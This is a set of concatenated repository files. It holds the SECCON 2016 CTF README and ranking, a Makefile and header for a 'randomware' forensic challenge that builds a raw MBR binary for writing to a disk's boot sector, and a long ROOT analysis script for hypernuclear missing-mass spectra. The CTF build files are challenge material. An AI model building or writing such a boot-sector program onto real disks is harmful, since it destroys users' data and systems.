        // Step forward: past 'Z' jumps straight to '_' (0x5F); any non-zero
        // value below 'A' snaps up to 'A'. NUL (0) stays below the range
        // only for one step (0 -> 1 -> snapped to 'A').
        public static limited_char operator ++(limited_char c)
        {
            int next = c._current + 1;
            if (next > 0x5a)
                next = 0x5f;
            if (next > 0 && next < 0x41)
                next = 0x41;
            return new limited_char((char)next);
        }

        // Step backward: anything above 'Z' clamps to 'Z'; anything below
        // 'A' collapses to NUL.
        public static limited_char operator --(limited_char c)
        {
            int prev = c._current - 1;
            if (prev > 0x5a)
                prev = 0x5a;
            if (prev < 0x41)
                prev = 0x0;
            return new limited_char((char)prev);
        }
    }
}
<file_sep>/README.md
# SECCON2016_online_CTF
We will update some challenges.
## Top 20 Ranking (12/11/2016 15:00 JST)
|Rank|Point|Team|
|---|---|---|
|1|6500|PPP|
|2|6400|217|
|3|5700|binja|
|4|5400|HITCON|
|5|5200|Cykor|
|6|5100|Dragon_Sector|
|7|4600|!SpamAndHex|
|8|4400|Bushwhackers|
|9|4100|Tasteless|
|10|4000|AAA|
|11|3900|KAIST GoN|
|12|3800|CS16|
|13|3500|0ops|
|14|3500|shellphish|
|15|3300|eee|
|16|3300|PwnPineappleApplePwn|
|17|3100|GYG|
|18|3100|0daysober|
|19|3100|CLGT|
|20|3000|ACM-ICPHP|
<file_sep>/Forensic/300_randomware/build/ransom/mbrapp/types.h
#ifndef _TYPES_H_
#define _TYPES_H_
typedef unsigned char uint8_t;
typedef unsigned short uint16_t;
typedef unsigned int uint32_t;
typedef unsigned long int uint64_t;
#endif // _TYPES_H_
<file_sep>/Forensic/300_randomware/build/ransom/mbrapp/Makefile
CC = gcc
LD = ld
AS = as

# Freestanding 32-bit build producing a raw flat binary (`mbr`) suitable
# for writing directly to a disk's boot sector.
CFLAGS = -m32 -ffreestanding -fno-common -fno-builtin -fomit-frame-pointer -masm=intel -O2
ASFLAGS = --32 -fno-common -fno-builtin -fomit-frame-pointer
LDFLAGS = -m elf_i386 -s -static -nostdlib -nmagic --oformat binary

# All of these targets name actions, not files, so mark them phony
# (boot/main produce boot.o/main.o, never files named "boot"/"main").
.PHONY: all link boot main write clean

all: link write

# NOTE(review): no .o files are passed on the ld command line -- this
# assumes linker.ld pulls in boot.o/main.o via INPUT(); verify.
link: boot main
	$(LD) $(LDFLAGS) -Tlinker.ld -o mbr

boot: boot.S
	$(AS) $(ASFLAGS) -c -o boot.o boot.S

main: main.c
	$(CC) $(CFLAGS) -c -o main.o main.c

write:
	# sudo ./writedisk.sh

clean:
	# BUG FIX: the link step outputs `mbr`, not `bin`; remove the real artifact.
	rm -f mbr *.o
| 4e2ea079b453457cb9b5dae88389b9da127f0540 | [
"Markdown",
"Makefile",
"C#",
"Python",
"PHP",
"C",
"Shell"
] | 21 | Shell | PinkDiamond1/SECCON2016_online_CTF | 5af1c81c9b20387b00ddb4fab4d116dbbd61d3a9 | 5788ff7e23475ccea5d2780bef3b420e819ee437 |
refs/heads/main | <repo_name>Bishnu04/E12-17-003-Matrices<file_sep>/SEPT20_TESTCODE.cc
// SEPT 20, 2021
// Author <NAME>
// Al data involved in tune
// On september 20, Aerogel cuts are loosen
extern double calcf2t_th(double* P,
double xf, double xpf,
double yf, double ypf,double);
extern double calcf2t_ph(double* P,
double xf, double xpf,
double yf, double ypf,double);
extern double calcf2t_mom(double* P,
double xf, double xpf,
double yf, double ypf,double);
const double XFPm=-0.7, XpFPm=-0.15; // m is the mean from the old definition
const double YFPm=-0.05, YpFPm=-0.18;
const double Xptm=-0.07, Yptm=-0.2, Momm=1.74; // tm = target offset.. MOmm is the momentum offset
const double XFPr=1.3, XpFPr=0.27; // r is the scaling factor or range
const double YFPr=0.1, YpFPr=0.10;
const double Xptr=0.15, Yptr=0.08, Momr=0.18; // tr is the target range
const double PLm = 25.4, PLr=0.7; // m is the offset and PLr is the path laegth range
const double Ztm = -0.15,Ztr=0.35; //Ztm z position at target point offset
extern void fcn(int &nPar, double* /*grad*/,
double &fval, double* param, int /*iflag*/);
extern double tune(double* pa, int j);
const int nmax = 3000; // was 3000 before Dec5
double x[nmax], y[nmax];
double xp[nmax], yp[nmax];
double z_recon[nmax];
int foil_flag[nmax];
int ntune_event = 0;
const int npeak = 2;
double Lambda_width[npeak] = {2.37, 2.3}; // +/- from mean position
double Lambda_cent[npeak] ={1115.75,1192.6}; // current peak location
double Lambda_real[npeak] ={1115.683,1192.642}; // Mev// nominal
double p10[nmax],p11[nmax],p12[nmax];
double p13[nmax],p14[nmax],p15[nmax];
double p16[nmax],p17[nmax],p18[nmax],p19[nmax];
double phir[nmax];
double phil[nmax];
// (((((((((((((((((((((((((((((((( t2 (((((((((((((((((((((((((((((((((((((((((((((((((((
const int nmax_2 = 3000; // 2400 before Dec 5
double x_2[nmax_2], y_2[nmax_2];
double xp_2[nmax_2], yp_2[nmax_2];
double z_recon_2[nmax_2];
int foil_flag_2[nmax_2];
const int npeak_2 = 1;
double Lambda_width_2[npeak_2] = {2.38}; //6.5,8.8}
double Lambda_cent_2[npeak_2] ={1115.71};
double Lambda_real_2[npeak_2] ={1115.683}; // Mev
double p10_2[nmax_2],p11_2[nmax_2],p12_2[nmax_2];
double p13_2[nmax_2],p14_2[nmax_2],p15_2[nmax_2];
double p16_2[nmax_2];
double phir_2[nmax_2];
double phil_2[nmax_2];
int ntune_event_2 = 0;
//===============================================Jan 07 2020==========================================
const int nmax_4 = 3000;
double x_4[nmax_4], y_4[nmax_4];
double xp_4[nmax_4], yp_4[nmax_4];
double z_recon_4[nmax_4];
int foil_flag_4[nmax_4];
const int npeak_4 = 3; // JAn 07
double Lambda_width_4[npeak_4] ={1.63,2.38,2.7};// +/- from mean position
double Lambda_cent_4[npeak_4] ={-13.24,-2.125,6.49};//current peak location
double Lambda_real_4[npeak_4] ={-13.24,-2.125,6.49};// nominal position
double p10_4[nmax_4],p11_4[nmax_4],p12_4[nmax_4];
double p13_4[nmax_4],p14_4[nmax_4],p15_4[nmax_4];
double p16_4[nmax_4];
double phir_4[nmax_4];
double phil_4[nmax_4];
int ntune_event_4 = 0;
//)))))))))))))))))))))))))))))))) t2 ))))))))))))))))))))))))))))))))))))))))))))))))))))))
// (((((((((((((((((((((((((((((((( t3 ((((((((((((((((((((((((((((((((((((((((((((((((((( // Jan_02
const int nmax_3 =3000;
double x_3[nmax_3], y_3[nmax_3];
double xp_3[nmax_3], yp_3[nmax_3];
double z_recon_3[nmax_3];
int foil_flag_3[nmax_3];
const int npeak_3 = 3;
double Lambda_width_3[npeak_3] ={1.63,2.38,2.7};// +/- from mean position
double Lambda_cent_3[npeak_3] ={-13.24,-2.125,6.49};//current peak location
double Lambda_real_3[npeak_3] ={-13.24,-2.125,6.49};// nominal position
double p10_3[nmax_3],p11_3[nmax_3],p12_3[nmax_3];
double p13_3[nmax_3],p14_3[nmax_3],p15_3[nmax_3];
double p16_3[nmax_3];
double phir_3[nmax_3];
double phil_3[nmax_3];
int ntune_event_3 = 0;
const double m_Al =25.1267; // Al target mass // BY Dr. Tang on Dec 19 2019
const double m_T = 2.808921; // for tritium target by Gogami Tritium target mass
//)))))))))))))))))))))))))))))))) t3 ))))))))))))))))))))))))))))))))))))))))))))))))))))))
//========================================
const int Total_Par = 126;
double thetaL_opt[nmax];
double phiL_opt[nmax];
double thetaR_opt[nmax];
double phiR_opt[nmax];
double momL_opt[nmax];
double momR_opt[nmax];
const int Mom_Par = 252;
//++++++++++++++++++++++++++++++++++++++++++
const double hrs_ang = 13.2 * 3.14159/180.;
const double me = 0.000511;
const double mk = 0.493677;
const double mp = 0.938272;
const double mL = 1.115683;
extern double CalcMM(double ee, double* pvec_ep, double* pvec_k, double mt);
void SEPT20_TESTCODE(){
// ========================================
// ======= Opening a ROOT file ============
// ========================================
TChain * t1 = new TChain("T");
TChain * t2 = new TChain("T");
TChain * t3 = new TChain("T");
t1->Add("./Rootfiles/DEC17_Rootfiles/DEC17_H149_542.root");// replayed on Dec 17, 2019 replay by ole
t2->Add("./Rootfiles/DEC17_Rootfiles/DEC17_HT_552_716.root");
t3->Add("./Rootfiles/DEC17_Rootfiles/DEC23_T221_830.root");
double ent = t1->GetEntries();
double ent_2 = t2->GetEntries();
double ent_3 = t3->GetEntries();
// ent = 50;
// ent_2= 50;
// ent_3 =50;
cout<<"entry in the t1=="<<ent<<endl;
cout<<"entry in the t2=="<<ent_2<<endl;
cout<<"entry in the t3=="<<ent_3<<endl;
const int max = 100;
Double_t trig5[max];
double momL[max];
double momR[max];
double lvz[max],rvz[max];// raster corrected
double th1[max], ph1[max];// RHRS angle
double th2[max], ph2[max];
double delta_pep[max]; // target straggling
double pep_real[max];
double delta_pk[max];
double pk_real[max];
double par_ep[3];
double par_k[3];
double mm;
double hallap;
double mmT_T; //sept4, 2020.. H/T considering as Tritium target
double l_th_fp[max];
double l_ph_fp[max];
double l_x_fp[max];
double l_y_fp[max];
double r_th_fp[max];
double r_ph_fp[max];
double r_x_fp[max];
double r_y_fp[max];
const int n = 16;
double ctime;
double z_av[nmax];
double z_av_1[nmax];
double a1, a2;
// (((((((((((((((((((((((((((((((( t2 (((((((((((((((((((((((((((((((((((((((((((((((((((
Double_t trig5_2[max]; // JUly 01, 2019
double momL_2[max];
double momR_2[max];
double lvz_2[max],rvz_2[max];// raster corrected
double th1_2[max], ph1_2[max];// RHRS angle
double th2_2[max], ph2_2[max];
double delta_pep_2[max]; // target straggling
double pep_real_2[max];
double delta_pk_2[max];
double pk_real_2[max];
double par_ep_2[3];
double par_k_2[3];
double mm_2;
double mm_4;
double mm_ht;
double hallap_2;
double par_ht_ep_2[3];
double par_ht_k_2[3];
double pep_ht_real_2[max];
double pk_ht_real_2[max];
double delta_ht_pep_2[max];
double delta_ht_pk_2[max];
double hallap_ht_2;
double z_av_ht_2[nmax];
double l_th_fp_2[max];
double l_ph_fp_2[max];
double l_x_fp_2[max];
double l_y_fp_2[max];
double r_th_fp_2[max];
double r_ph_fp_2[max];
double r_x_fp_2[max];
double r_y_fp_2[max];
double ctime_2;
double z_av_2[nmax];
double z_av_1_2[nmax];
double a1_2, a2_2;
//)))))))))))))))))))))))))))))))) t2 ))))))))))))))))))))))))))))))))))))))))))))))))))))))
// (((((((((((((((((((((((((((((((( t3 variables starts here ((((((((((((((((((((((((((((((((((((((((((((((((((( Jan_02
Double_t trig5_3[max]; // JUly 01, 2019
double momL_3[max];
double momR_3[max];
double lvz_3[max],rvz_3[max];// raster corrected
double th1_3[max], ph1_3[max];// RHRS angle
double th2_3[max], ph2_3[max];
double delta_pep_3[max]; // target straggling
double pep_real_3[max];
double delta_pk_3[max];
double pk_real_3[max];
double par_ep_3[3];
double par_k_3[3];
double par_tt_ep_3[3];//// May 01, 2021 , tt means T/T
double par_tt_k_3[3];//// May 01, 2021 , tt means T/T
double hallap_tt_3;//// May 01, 2021 , tt means T/T
double z_av_tt_3[nmax];//// May 01, 2021 , tt means T/T
double delta_tt_pep_3[max];//// May 01, 2021 , tt means T/T
double delta_tt_pk_3[max];//// May 01, 2021 , tt means T/T
double pep_tt_real_3[max];//// May 01, 2021 , tt means T/T
double pk_tt_real_3[max];//// May 01, 2021 , tt means T/T
double mm_3;
double mm_t;
double mm_Al;
double mm_Al1;
double a1_3, a2_3;
double mm_h;
double hallap_3;
double l_th_fp_3[max];
double l_ph_fp_3[max];
double l_x_fp_3[max];
double l_y_fp_3[max];
double r_th_fp_3[max];
double r_ph_fp_3[max];
double r_x_fp_3[max];
double r_y_fp_3[max];
double ctime_3;
double z_av_3[nmax];
double z_av_1_3[nmax];
//)))))))))))))))))))))))))))))))) t3 variables up to here ))))))))))))))))))))))))))))))))))))))))))))))))))))))
// (((((((((((((((((((((((((((((((( t1 branch address (((((((((((((((((((((((((((((((((((((((((((((((((((
t1->SetBranchAddress("HALLA_p", &hallap);
t1->SetBranchAddress("DR.T5", &trig5);
t1->SetBranchAddress("L.tr.x", &l_x_fp);
t1->SetBranchAddress("L.tr.y", &l_y_fp);
t1->SetBranchAddress("L.tr.th", &l_th_fp);
t1->SetBranchAddress("L.tr.ph", &l_ph_fp);
t1->SetBranchAddress("R.tr.x", &r_x_fp);
t1->SetBranchAddress("R.tr.y", &r_y_fp);
t1->SetBranchAddress("R.tr.th", &r_th_fp);
t1->SetBranchAddress("R.tr.ph", &r_ph_fp);
t1->SetBranchAddress("coin_time", &ctime);
t1->SetBranchAddress("ztR_wRC", &rvz);
t1->SetBranchAddress("ztL_wRC", &lvz);
t1->SetBranchAddress("R.a1.asum_c", &a1);
t1->SetBranchAddress("R.a2.asum_c", &a2);
// (((((((((((((((((((((((((((((((( t2 (((((((((((((((((((((((((((((((((((((((((((((((((((
t2->SetBranchAddress("HALLA_p", &hallap_2);
t2->SetBranchAddress("DR.T5", &trig5_2);
t2->SetBranchAddress("L.tr.x", &l_x_fp_2);
t2->SetBranchAddress("L.tr.y", &l_y_fp_2);
t2->SetBranchAddress("L.tr.th", &l_th_fp_2);
t2->SetBranchAddress("L.tr.ph", &l_ph_fp_2);
t2->SetBranchAddress("R.tr.x", &r_x_fp_2);
t2->SetBranchAddress("R.tr.y", &r_y_fp_2);
t2->SetBranchAddress("R.tr.th", &r_th_fp_2);
t2->SetBranchAddress("R.tr.ph", &r_ph_fp_2);
t2->SetBranchAddress("coin_time", &ctime_2);
t2->SetBranchAddress("ztR_wRC", &rvz_2);
t2->SetBranchAddress("ztL_wRC", &lvz_2);
t2->SetBranchAddress("R.a1.asum_c", &a1_2);
t2->SetBranchAddress("R.a2.asum_c", &a2_2);
//)))))))))))))))))))))))))))))))) t2 ))))))))))))))))))))))))))))))))))))))))))))))))))))))
// (((((((((((((((((((((((((((((((( t3 ((((((((((((((((((((((((((((((((((((((((((((((((((( Jan_02
t3->SetBranchAddress("HALLA_p", &hallap_3);
t3->SetBranchAddress("DR.T5", &trig5_3);
t3->SetBranchAddress("L.tr.x", &l_x_fp_3);
t3->SetBranchAddress("L.tr.y", &l_y_fp_3);
t3->SetBranchAddress("L.tr.th", &l_th_fp_3);
t3->SetBranchAddress("L.tr.ph", &l_ph_fp_3);
t3->SetBranchAddress("R.tr.x", &r_x_fp_3);
t3->SetBranchAddress("R.tr.y", &r_y_fp_3);
t3->SetBranchAddress("R.tr.th", &r_th_fp_3);
t3->SetBranchAddress("R.tr.ph", &r_ph_fp_3);
t3->SetBranchAddress("coin_time", &ctime_3);
t3->SetBranchAddress("ztR_wRC", &rvz_3);
t3->SetBranchAddress("ztL_wRC", &lvz_3);
t3->SetBranchAddress("R.a1.asum_c", &a1_3);
t3->SetBranchAddress("R.a2.asum_c", &a2_3);
//)))))))))))))))))))))))))))))))) t3 barnch address up to here ))))))))))))))))))))))))))))))))))))))))))))))))))))))
TFile* fnew = new TFile("./output_root/paper_prep.root","recreate");
TTree* tnew = new TTree("tree","For z calibration (LHRS)");
tnew->Branch("HALLA_p", &hallap,"HALLA_p/D");
tnew->Branch("L.tr.vz", &lvz, "L.tr.vz[100]/D");
tnew->Branch("L.tr.x", &l_x_fp, "L.tr.x[100]/D");
tnew->Branch("L.tr.y", &l_y_fp, "L.tr.y[100]/D");
tnew->Branch("L.tr.th", &l_th_fp,"L.tr.th[100]/D");
tnew->Branch("L.tr.ph", &l_ph_fp,"L.tr.ph[100]/D");
tnew->Branch("L.tr.tg_th_TH2", &th2, "L.tr.tg_th_TH2[100]/D");
tnew->Branch("L.tr.tg_ph_PH2", &ph2, "L.tr.tg_ph_PH2[100]/D");
double XFP, XpFP;
double YFP, YpFP;
double R_XFP, R_XpFP;
double R_YFP, R_YpFP;
// ((((((((((((((((((((((((((((((((((((((((((( for t2 ((((((((((
double XFP_2, XpFP_2;
double YFP_2, YpFP_2;
double R_XFP_2, R_XpFP_2;
double R_YFP_2, R_YpFP_2;
//)))))))))))))))))))))))))))))))))))))))))))))
// ((((((((((((((((((((((((((((((((((((((((((( for t3 (((((((((( Jan_02
double XFP_3, XpFP_3;
double YFP_3, YpFP_3;
double R_XFP_3, R_XpFP_3;
double R_YFP_3, R_YpFP_3;
//)))))))))))))))))))))))))))))))))))))))))))))
// ((((((((((((((((((((((((((((((((((((((((((( for t2 ((((((((((
double XFP_4, XpFP_4;
double YFP_4, YpFP_4; // jan 07 2020
double R_XFP_4, R_XpFP_4;
double R_YFP_4, R_YpFP_4;
// ===============or LHRS theta information input==========
ntune_event = 0;
for(int i=0 ; i<Total_Par; i++){
thetaL_opt[i] = -2222.0;
}
char name_Angle_L[500];
// sprintf(name_Angle_L,"./matrices/theta_3rd_LHRS_Opt_7.dat");//theta_3rd_LHRS_Opt_7.dat
sprintf(name_Angle_L,"./matrices/theta_L4th_4th_6.dat");// optimized on OCT 23, 2019 with SS data
ifstream Angle_L(name_Angle_L);
double Theta_L[Total_Par];
for(int i =0; i<Total_Par;i++){
double par1 =0.0;
int p1 =0;
Angle_L>>par1>>p1>>p1>>p1>>p1>>p1;
Theta_L[i]=par1;
thetaL_opt[i] = Theta_L[i];
}
Angle_L.close();
//++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
// for LHRS phi information input
//--------------------------------------------------------
ntune_event = 0;
for(int i =0;i<Total_Par;i++){
phiL_opt[i] = -2222.0;
}
char name_angle_phi[500];
// sprintf(name_angle_phi,"./matrices/phi_LHRS_3rd_Opt_9.dat");
sprintf(name_angle_phi,"./matrices/phi_L4th_5th_5.dat");// optimized on OCT 23, 2019
ifstream angle_phi(name_angle_phi);
double PHI_L[Total_Par];
for(int i =0; i<Total_Par;i++){
double par2 =0.0;
int p2 =0;
angle_phi>>par2>>p2>>p2>>p2>>p2>>p2;
PHI_L[i] = par2;
phiL_opt[i]= PHI_L[i];
}
angle_phi.close();
// LHRS momentum information========================July 20, 2019
ntune_event = 0;
for(int i =0;i<Mom_Par;i++){
momL_opt[i] = -2222.0;
}
char name_Mom_lhrs[500];
// sprintf(name_Mom_lhrs,"./MOM_MATRICES/LMOM5_1st_0.dat"); /// Previously optimized without Al Data May 02, 2021
sprintf(name_Mom_lhrs,"./MOM_MATRICES/LMOM5_Aug14_4th_0.dat");// tuned with Al data (no shift is included)
ifstream Mom_lhrs(name_Mom_lhrs);
double mom_L[Mom_Par];
for(int i = 0; i<Mom_Par;i++){
double par5 = 0.0;
int p5 =0;
Mom_lhrs>>par5>>p5>>p5>>p5>>p5>>p5;
mom_L[i]= par5;
momL_opt[i] = mom_L[i];
}
Mom_lhrs.close();
// up to here thelhrs momentum matrix======================
// =======RHRS theta input information
ntune_event =0;
for(int i =0;i<Total_Par;i++){
thetaR_opt[i] = -2222.0;
}
char name_Angle_R[500];
sprintf(name_Angle_R,"./All_Matrices/xpt_RHRS_4_upto2.dat"); //This is the RHRS Phi matrix optimized by Gogami with ss data
ifstream Angle_R(name_Angle_R);
double Theta_R[Total_Par];
for(int i =0; i<Total_Par;i++){
double par3 =0.0;
int p3 = 0;
Angle_R>>par3>>p3>>p3>>p3>>p3>>p3;
Theta_R[i]=par3;
thetaR_opt[i] = Theta_R[i];
}
Angle_R.close();
//====================================================
//=======RHRS phi input information===============
ntune_event = 0;
for(int i =0;i<Total_Par;i++){
phiR_opt[i] = -2222.0;
}
char name_phi_Rhrs[500];
sprintf(name_phi_Rhrs,"./All_Matrices/ypt_RHRS_4_upto2.dat"); //This is the RHRS Phi matrix optimized by Gogami with ss data
ifstream phi_Rhrs(name_phi_Rhrs);
double PHI_R[Total_Par];
for(int i =0; i<Total_Par;i++){
double par4 =0.0;
int p4 =0;
phi_Rhrs>>par4>>p4>>p4>>p4>>p4>>p4;
PHI_R[i] = par4;
phiR_opt[i]= PHI_R[i];
}
phi_Rhrs.close();
//==================================================
// =====RHRS momentum recon==========================6
ntune_event = 0;
for(int i =0;i<Mom_Par;i++){
momR_opt[i] = -2222.0;
}
char name_Mom_rhrs[500];
// sprintf(name_Mom_rhrs,"./MOM_MATRICES/RMOM5_2nd_0.dat"); // Optimized without Al data May 02, 2021
sprintf(name_Mom_rhrs,"./MOM_MATRICES/RMOM5_July8_1st_0.dat");// tuned with Al data (no shift is included)
ifstream Mom_rhrs(name_Mom_rhrs);
double mom_R[Mom_Par];
for(int i = 0; i<Mom_Par;i++){
double par6 = 0.0;
int p6 =0;
Mom_rhrs>>par6>>p6>>p6>>p6>>p6>>p6;
mom_R[i]= par6;
momR_opt[i] = mom_R[i];
}
Mom_rhrs.close();
// =====RHRS momentum recon up to here===============
gStyle->SetTickLength(0.055,"X");
TH1F *h = new TH1F("h"," ;Missing Mass(MeV/c^{2});Counts/ 0.75MeV ",333,1025,1275); // to plot lambda and sigma (H/H data)
TH1F *h_2 = new TH1F("h_2"," ;Missing Mass(MeV/c^{2});Counts/ 0.75MeV ",333,1025,1275); //Lambda (H/T data)
TH1F *hh = new TH1F("hh","Al Spectrum, H/T data ; -B_{#Lambda}(MeV);Counts/ 1.5 MeV ",208,-100,212);
TH1F *ht = new TH1F("ht","Al Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/ 1.5 MeV ",208,-100,212);
TH1F *htt = new TH1F("htt","Al Spectrum(H/T + T/T data); -B_{#Lambda}(MeV);Counts/ 1.5 MeV ",208,-100,212);
TH1F *hb = new TH1F("hb","Al Spectrum, H/T data ; -B_{#Lambda}(MeV);Counts/ 1.5 MeV ",208,-100,212);
TH1F *hb1 = new TH1F("hb1","Al Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/ 1.5 MeV ",208,-100,212);
TH1F *hb2 = new TH1F("hb2","Al Spectrum(H/T + T/T data); -B_{#Lambda}(MeV);Counts/ 1.5 MeV ",208,-100,212);
TH1F *hal_15 = new TH1F("hal_15","Al Spectrum,(H/T + T/T data) ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",151,-100,202);
TH1F *hal_15_1 = new TH1F("hal_15_1","Al Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",151,-100,202);
TH1F *hal_15_2 = new TH1F("hal_15_2","Al Spectrum(H/T + T/T data); -B_{#Lambda}(MeV);Counts/2.0 MeV ",151,-100,202);
TH1F *hbal_15 = new TH1F("hbal_15","Al Spectrum, H/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",151,-100,202);
TH1F *hbal_15_1 = new TH1F("hbal_15_1","Al Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",151,-100,202);
TH1F *hbal_15_2 = new TH1F("hbal_15_2","Al Spectrum(H/T + T/T data); -B_{#Lambda}(MeV);Counts/2.0 MeV ",151,-100,202);
TH1F *h_al = new TH1F("h_al","Al Spectrum, H/T data ; -B_{#Lambda}(MeV);Counts/ 1.25 MeV ",240,-100,200);
TH1F *h_al1 = new TH1F("h_al1","Al Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/ 1.25 MeV ",240,-100,200);
TH1F *h_al2 = new TH1F("h_al2","Al Spectrum(H/T + T/T data); -B_{#Lambda}(MeV);Counts/ 1.25 MeV ",240,-100,200);
TH1F *hb_al = new TH1F("hb_al","Al Spectrum, H/T data ; -B_{#Lambda}(MeV);Counts/ 1.25 MeV ",240,-100,200);
TH1F *hb_al1 = new TH1F("hb_al1","Al Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/ 1.25 MeV ",240,-100,200);
TH1F *hb_al2 = new TH1F("hb_al2","Al Spectrum(H/T + T/T data); -B_{#Lambda}(MeV);Counts/MeV ",240,-100,200);
TH1F *hal_20 = new TH1F("hal_20","Al Spectrum (H/T+T/T data) ; -B_{#Lambda}(MeV);Counts/2 MeV ",155,-100,210);
TH1F *hal_20_1 = new TH1F("hal_20_1","Al Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2 MeV ",155,-100,210);
TH1F *hal_20_2 = new TH1F("hal_20_2","Al Spectrum(H/T + T/T data); -B_{#Lambda}(MeV);Counts/2 MeV ",155,-100,210);
TH1F *hbal_20 = new TH1F("hbal_20","Al Spectrum, H/T data ; -B_{#Lambda}(MeV);Counts/2 MeV ",155,-100,210);
TH1F *hbal_20_1 = new TH1F("hbal_20_1","Al Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2 MeV ",155,-100,210);
TH1F *hbal_20_2 = new TH1F("hbal_20_2","Al Spectrum(H/T + T/T data); -B_{#Lambda}(MeV);Counts/2 MeV ",155,-100,210);
TH1F *h20 = new TH1F("h20","Al Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/ 1.5 MeV ",204,-103,203);
TH1F *h21 = new TH1F("h21","Al Spectrum,H/T data ; -B_{#Lambda}(MeV);Counts/ 1.5 MeV ",204,-103,203);
TH1F *HT = new TH1F("HT","Al Spectrum( H/T+ TT data); -B_{#Lambda}(MeV);Counts/ 1.5 MeV ",204,-103,203);
TH1F *h20_b = new TH1F("h20_b","Al Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/ 1.5 MeV ",204,-103,203);
TH1F *h21_b = new TH1F("h21_b","Al Spectrum,H/T data ; -B_{#Lambda}(MeV);Counts/ 1.5 MeV ",204,-103,203);
TH1F *HT_b = new TH1F("HT_b","Al Spectrum( H/T+ TT data); -B_{#Lambda}(MeV);Counts/ 1.5 MeV ",204,-103,203);
TH1F *hd = new TH1F("hd","Al Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/1.5 MeV ",202,-100.5,202.5);//need here
TH1F *he = new TH1F("he","Al Spectrum,H/T data ; -B_{#Lambda}(MeV);Counts/1.5MeV ",202,-100.5,202.5);
TH1F *hf = new TH1F("hf","Al Spectrum(H/T+ TT); -B_{#Lambda}(MeV);Counts/1.5MeV ",202,-100.5,202.5);
TH1F *hb5 = new TH1F("hb5","Al Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/1.5 MeV ",202,-100.5,202.5);
TH1F *hb6 = new TH1F("hb6","Al Spectrum,H/T data ; -B_{#Lambda}(MeV);Counts/1.5 MeV ",202,-100.5,202.5);
TH1F *hb7 = new TH1F("hb7","Al Spectrum(H/T+ TT); -B_{#Lambda}(MeV);Counts/ 1.5 MeV ",202,-100.5,202.5);
TH1F *h50 = new TH1F("h50","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",125,-100.5,149.5);
TH1F *h50b = new TH1F("h50b","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",125,-100.5,149.5);
TH1F *h25_2 = new TH1F("h25_2","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.5 MeV ",102,-99.5,154.5);
TH1F *h25_2b = new TH1F("h25_2b","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.5 MeV ",102,-99.5,154.5);
TH1F *h30_1 = new TH1F("h30_1","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.3 MeV ",110,-100,153);
TH1F *h30_2 = new TH1F("h30_2","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.3 MeV ",110,-101,152);
TH1F *h30_3 = new TH1F("h30_3","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.3 MeV ",110,-99,154);
TH1F *h35_1 = new TH1F("h35_1","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.35 MeV ",108,-100,154);
TH1F *h35_2 = new TH1F("h35_2","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.35 MeV ",108,-104,150);
TH1F *h35_3 = new TH1F("h35_3","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.35 MeV ",108,-99,155);
TH1F *h35_4 = new TH1F("h35_4","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.35 MeV ",108,-98,156);
TH1F *h54 = new TH1F("h54","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2 MeV ",125,-100,150);
TH1F *hb54 = new TH1F("hb54","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2 MeV ",125,-100,150);
TH1F *h1_2 = new TH1F("h1_2","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",128,-104,152); // C/1.52 in really
TH1F *h1_2b = new TH1F("h1_2b","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",128,-104,152); // C/1.52 in really
TH1F *h1_qu = new TH1F("h1_qu","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/1.6 MeV ",160,-100,156);
TH1F *h1_qub = new TH1F("h1_qub","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/1.6 MeV ",160,-100,156);
TH1F *h1_q1 = new TH1F("h1_q1","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",125,-102,150);
TH1F *h1_qb1 = new TH1F("h1_qb1","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",125,-102,150);
/////////////////////++++++++++ Dec01, 2020&&&&&&&&&&&&&&&&&&##################@@@@@@@@@@@@@@@@@!!!!!!!!!
TH1F *h1_0 = new TH1F("h1_0","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/1.5 MeV ",174,-110,151);
TH1F *h1_01 = new TH1F("h1_01","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",125,-100,150);
TH1F *h1_01b = new TH1F("h1_01b","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",125,-100,150);
TH1F *h1_may = new TH1F("h1_may","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/1.5 MeV ",173,-103.55,156.35);
TH1F *h1b_may = new TH1F("h1b_may","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/1.5 MeV ",173,-103.55,156.35);
